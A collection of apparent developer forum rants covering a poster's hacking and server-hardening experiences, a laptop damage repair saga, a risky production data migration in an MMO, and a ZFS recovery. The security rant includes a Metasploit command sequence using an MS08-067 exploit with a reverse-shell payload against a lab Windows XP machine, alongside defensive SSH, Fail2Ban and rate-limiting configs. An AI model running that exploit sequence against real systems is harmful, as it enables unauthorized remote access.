Hacking/attack experiences...
I'm, for obvious reasons, only going to talk about the attacks I went through and the *legal* ones I did 😅 😜
Let's first get some things clear, plus some fun facts:
I've been doing offensive security since I was 14-15. Defensive since the age of 16-17. I'm getting close to 23 now, for the record.
First system ever hacked (metasploit exploit): Windows XP.
(To be clear, at home through a pentesting environment, all legal)
Easiest system ever hacked: Windows XP yet again.
Time it took me to crack/hack into today's OSes (remote + local exploits; I don't remember which ones I used, by the way):
Windows XP: five seconds (damn, those Metasploit exploits are powerful - something like the sketch after this list)
Windows Vista: Few minutes.
Windows 7: Few minutes.
Windows 10: Few minutes.
OS X (in general): an hour (finding a good exploit took some time; got to root level easily afterwards. No, I do not remember how/what exactly, it's years and years ago)
Linux (Ubuntu): A month approx. Ended up using a Java applet through Firefox when that was still a thing. Literally had to click it manually xD
Linux (RHEL-based systems): Still not exploited. SELinux is powerful, motherfucker.
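To give you an idea of the XP one: it was a stock Metasploit run along these lines. I genuinely don't remember the exact module, so treat MS08-067 and the addresses as placeholders:
  msfconsole
  use exploit/windows/smb/ms08_067_netapi
  set RHOST 192.168.56.101                     # the lab XP box (placeholder IP)
  set PAYLOAD windows/meterpreter/reverse_tcp
  set LHOST 192.168.56.1                       # my attacking machine (placeholder IP)
  exploit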
Keep in mind that I had a great pentesting setup back then 😊. I don't have one anymore, nor do I do that anymore, since I love defensive security more nowadays and simply don't have the time.
Dealing with attacks and getting hacked.
Keep in mind that I manage around 20 servers (including VPSes and dedis), so I get the usual amount of SSH brute force attacks (thanks for keeping me safe, CSF!), which is about 40-50K every hour. Those IPs automatically get blocked after three failed attempts within 5 minutes. No root login allowed + RSA key login with freaking strong passwords/passphrases.
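The SSH side of that boils down to a few sshd_config lines; a sketch of that kind of setup, not my literal config:
  # /etc/ssh/sshd_config - sketch, not my exact config
  PermitRootLogin no
  PasswordAuthentication no    # key-only logins
  PubkeyAuthentication yes
  MaxAuthTries 3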
linu.xxx/much-security.nl - All kinds of attacks: application attacks, brute force, sometimes DDoS, but that is mostly mitigated at provider level, to name a few. So, except for my own tests and a few DDoSes on both those domains, nothing really threatening (as in, nothing seems to have fucked anything up yet).
How did I discover that two of my servers were hacked through brute forcers while no brute force protection was in place yet? I had installed a barebones Ubuntu Server onto both; it only comes with system-default applications. Tried installing Nginx the next day - port 80 was already in use. I always run 'pidof apache2' to make sure it isn't running, and I thought I'd run it for fun even though I knew I hadn't installed it and it doesn't come with the distro. It was actually running. Checked the auth logs and saw successful root logins - fuck me - reinstalled the servers and installed Fail2Ban, which bans any IP address with three failed SSH logins within 5 minutes:
Enabled Fail2Ban -> checked iptables (iptables -L) literally two seconds later: 100+ banned IP addresses - holy fuck, no wonder I got hacked!
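For reference, that rule is just a few lines in jail.local; a minimal sketch matching those numbers (the ban length is my pick, not from the rant):
  # /etc/fail2ban/jail.local - minimal sketch
  [sshd]
  enabled  = true
  port     = ssh
  maxretry = 3      # three failed logins...
  findtime = 300    # ...within 5 minutes...
  bantime  = 3600   # ...earns a 1-hour ban (ban length is my pick)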
There's one other kind of attack I get regularly, but unless it gets much worse, I'll just deal with it :)
Dealing with different kinds of attacks:
Web app attacks: extensively testing everything for security vulns before releasing it into the open.
Network attacks: Nginx rate limiting/CSF rate limiting against SYN DDoS attacks, for example (a sketch follows right after this list).
System attacks: anti brute force software (Fail2Ban or CSF), anti-rootkit software, AppArmor or (which I prefer) SELinux - which actually catches quite a few web app attacks as well - and REGULARLY UPDATING THE SERVERS/SOFTWARE.
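For the network bit, the Nginx side is just request-rate limiting (the actual SYN flood part is handled at the kernel/CSF level); a sketch with made-up zone name and rates:
  # nginx.conf, http block - made-up zone name and rates
  limit_req_zone $binary_remote_addr zone=perip:10m rate=10r/s;
  server {
      location / {
          limit_req zone=perip burst=20 nodelay;
      }
  }
  # and on the kernel side, for actual SYN floods:
  # sysctl -w net.ipv4.tcp_syncookies=1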
So yah, hereby :P
Dell's XPS is made of magic. [long story, major fuckup, 10k+ in damages]
It all started in December. One morning I was late to work, so I drove there as fast as possible. (I live like 3 minutes away, so me being late really meant *late*.) Parked my car in a secluded car park, grabbed my backpack and ran to work. The car park is like 100 meters away from work, so I sprinted for it. Next thing I know, my heels lose all grip going down a small slope and I drop onto my back, full force, on a sharp-edged stone. With only my $1700 XPS in the backpack. Fuck.
I panicked, but got up and ran on to work. There I checked on the notebook, praying it would boot. It booted! Holy shit. I flipped the notebook over and saw two small dents in the aluminum shell. I was thoroughly impressed. I later discovered that the impact left a small shadow on the display, but given what a hit that was (I am not exactly a lightweight), impressive would be a massive understatement.
Fast forward to February. I am weighing my options to maybe get the screen replaced, as damage to my hardware (even if negligible) triggers some sort of OCD and makes me feel bad 24/7. Also, my laptop tends to shut off from time to time; I looked into the Event Viewer and saw a kernel panic. I figured the battery probably took a hit as well and drops voltage from time to time, making the kernel assume a critical situation and shut off.
It stayed quite snowy in Austria up until March, so occasional snowfall wasn't rare. Got out of work one day and saw it had snowed a bit. Whatever. I had my mom's car at the time, so I tested whether it would slide a bit if I did donuts on the now (5pm) empty parking lot. Nothing. Drove down a small hill; the ABS triangle lit up red (the onboard computer can't fully compensate for the snow). I drove out to the main street, where everything was salted, and drove along towards my house. Took a turn into my street, accelerated for a bit and then went off the gas so the car would smoothly coast along, slowly losing speed. So I went off the gas and noticed I was a bit to the right. No wonder: centrifugal forces.
*steers left*
"Huh seems like I need a bit more"
*car still doesn't move much*
"What the- go to the left!"
*steers left hard*
"Fuck that wall is coming closer"
*Brakes*
*car doesn't brake*
"FUCK FUCK FUCK FUCK!!!"
Everything got quiet in seconds. I woke up to a deployed airbag, ripped pants, a hurting wrist, the radio somewhere on the floor and fumes that smelled like burning wires. I grabbed my backpack, which was now somewhere on the floor instead of on the seat, and ran outside, tears in my eyes and the phone on my ear, calling my mom. I walked inside as she walked outside, hearing a weeping scream that I hadn't heard from her in my whole life. While walking inside I noticed my backpack was wet on the bottom: my 2-litre water jug had shattered when the backpack hit the dashboard. I tried to stay calm and act rationally, knowing that every second counts when it comes to water damage. I hastily searched for some rice and a bag to put my laptop into, stuffed the bag with both and went outside. The car was totaled, my mom pissed and crying. And I was in shock, sad, angry and hurting.
I kept the laptop on my heater for a few days, bagged in rice. I dared to try a boot after a while and, you won't believe me, it fucking booted. Even the keyboard backlight worked; just the screen was obviously broken in the back (no color distortion or bad pixel rows, though!!) and the aluminum shell had a dent on the front. I talked with Dell Support a few days later, asking if it would be OK to open the XPS up so I could drain all of the water. She said yes, that's fine, as long as I don't touch anything or screw around with it.
She said I could send it in and get it checked, but the pickup and analysis would cost $150, and I could go from there.
I sent it in and estimated that, because the battery, screen and other things probably needed changing, it would be around $900.
Got a call a few weeks later:
"Hello beggarboy, the repair team reported back to us and said that they will have to replace everything, which will be 1700$."
"Fuck... Buying a new one is cheaper.."
"Yeah I know I am sorry about that, I can offer you a voucher so you can buy a new one for 250$ off if you would prefer that"
"Sorry but I will need some time to consider"
"I understand."
The agent clearly noticed I was bummed about it.
After going back and forth on what to do, I got another call a few days later.
"Hello beggarboy, we talked a few days ago. I have good news"
"Hello, yes, speak up?"
"I was able to get a special offer for you after putting in a few words..."
The next thing she said seemed unreal to me.
She was able to cut $600 (!!!), making the new offer $1100, instead of $1700 for the repair or $1500 for a new one. I figured she probably did that because I am always very polite with support staff. Always.
My XPS is back and healthy again.
Thank you for taking the time to read this.
Dell's XPS is made of magic.
The riskiest dev choice...
How about "The riskiest thing you've done as a dev"? I have a great entry for that. and I suppose it was my choice to build the feature afterall.
I was working on an instance of a small MMO at a game company I worked for. The MMO boasted multiple servers, each of them a vastly different take on the base game. We could use, extend, or outright replace anything we wanted to, leading to everything from Zelda to Pokémon to an RP haven to a top-down futuristic Counter-Strike. The server in this particular instance was a fantasy RPG, and I was building it a new leveling and experience system with most of the trimmings. (Talents, feats/perks, etc. were in a future update.)
A bit of background first: the game's dev setup did not have the now-standard dev/staging/prod servers; everything ran on prod, devs worked on prod, players connected and played on prod, etc. Worse yet, there was no backup system implemented -- or not really. The CTO was really the only person with sufficient access. The techy CEO did as well, but he rarely dealt with anything technical except server hardware, occasionally. And usually just to troll/punish us devs (as in "Oops! I pulled the cat5! ;)"). Neither of them were the most reliable of people, either. The CTO would occasionally remote in and make backups of each server -- we assumed whenever he happened to think of it -- and would also occasionally do it when asked, but it could take him a week, sometimes even a month, to get around to it. So the backups were only really useful for retrieving lost code and assets, not so much for player data.
The lack of reliable backups and the lack of proper testing grounds (among the plethora of other issues at the company) made for an absolutely terrible dev setup, but that's just how it was, and that's what we dealt with. We were game devs, after all. Terrible or not, we got to make games! What more could you ask for!? It was amazing and terrible and wonderful and the worst thing ever, all at the same time. (And no, I'm not sharing the company name, but it isn't EA or Nexon, surprisingly 😅)
Anyway, back to the story! My new leveling system also needed to migrate players' existing data, so... you can see where this is going.
I did as much testing and inspection of my code as I could, copied it from a personal dev script to the server's XP system, ... and debated whether I really wanted to click [Apply]. Every time I considered it, I went back to check another part or do yet more testing. I ended up taking like 40 minutes to finally click it.
And when I did... that was the scariest button press of my life. And the scariest three seconds' wait afterwards. That one click could have ruined every single player's account, permanently lost us players ...
After applying it, I immediately checked my character to see if she was broken, checked the account data for corruption or botched flags, checked for broken interactions with the other systems....
Everything ended up working out perfectly, and the players loved all of the new features. They had no idea what went into building them, and certainly had no idea of what went into applying them, or what could have gone wrong -- which is probably a good thing.
Looking back, that entire environment was so fragile, it's a wonder things didn't go horribly wrong all the time. Really, they almost never did. Apocalypses did happen, but were exceedingly rare, and were usually fixed quickly. I guess we were all super careful simply because everything was so fragile? Or the decent devs were, at least. We never trusted the lessers with access 😅 at least on the main servers, where it mattered. Some of the smaller servers... well, we never really cared about those.
But I'm honestly more surprised to realize I've never had nightmares about that button click. It was certainly terrifying enough.
But yay! Complete system overhaul and migration of stored and realtime player data! on prod! With no issues! And lots of happy players! Woooooo!
Thinking back on it makes me happy 😊
My Sunday morning until afternoon. FML. So I had been experiencing nightly reboots of my home server for three days. Always at 3:12am, strange thing. Sunday morning (ca. 10am) I thought I'd investigate, because the reboots affected my backups as well. All the logs and the security mails said was that some processes received signal 11. Strange. Checked the periodic tasks and executed every task manually. Nothing special. Strange. Checked SMART status for all disks. Two disks were having CRC errors. Not many, but a couple. Oh well. Changing SATA cables again 🙄. But those CRC errors cannot be the reason for the reboots at precisely the same time each night. I noticed that all my zpools got scrubbed except my root pool, which hadn't been scrubbed since the error first occurred. Well, let's do it by hand: zpool scrub zroot... Freeze. Dafuq. Walked over to the server and reset it. Waited 10 minutes. System not up yet. Fuuu... that was when I first guessed that Sunday wouldn't be that sunny after all. Connected a monitor. Reset. Black screen?!?! Disconnected all disks and so on. Reset. Black screen. Oh c'moooon! CMOS reset. Black screen. Sigh. CMOS reset with a 5-minute battery removal, and a new SATA cable just in case. Yes, boots again. Mood lightened... Now the system segfaults when importing zroot. God damnit. Pulled out the FreeBSD boot stick. zpool import -R /tmp zroot... segfault. Reboot. Read-only zroot import. Manually triggered a checksum test with the zdb command: "invalid blkptr type". Deep breath now. Destroyed the pool, recreated it. zfs send/recv from backup. Some more config. Reboot. Boots, yeah... Doesn't find files??? Reboot. Other error? Undefined symbols???? Now I need another coffee. Maybe I did something wrong during recovery? Not very likely, but let's do it again... recovered the recovery. Different but equally horrible errors. What in the name...? Pulled out a really old disk. Put it in, boots fine. So it must be the disks. Walked around the house and searched for some new disks for a new 2-disk ZFS root mirror to replace the obviously broken ones. Even found some new ones. Recovery boot, minimal FreeBSD install for the bootloader and so on. Deleted and recreated zroot, zfs send/recv from backup. Set the bootfs attribute, reboot........
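For the curious, that last recovery boiled down to something like this - pool/dataset/snapshot names are placeholders, written from memory, not my exact commands:
  # from the FreeBSD boot stick - names are placeholders
  zpool create -f zroot mirror ada0p3 ada1p3
  zfs send -R backup/zroot@latest | zfs receive -F zroot
  zpool set bootfs=zroot/ROOT/default zroot
  # then reinstall the bootloader (gpart bootcode ...), reboot and pray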
It works again. Fuck it, now it is 6pm and I still haven't showered. I put both disks through extensive tests and checked every single block: these disks aren't faulty. But for some reason they froze my system in a way that forced me to reset my BIOS, and they had really low-level data errors...? I wonder if those disks have a firmware problem? So that was most of my Sunday. Nice, isn't it? But hey: a calm sea won't make a good sailor, right?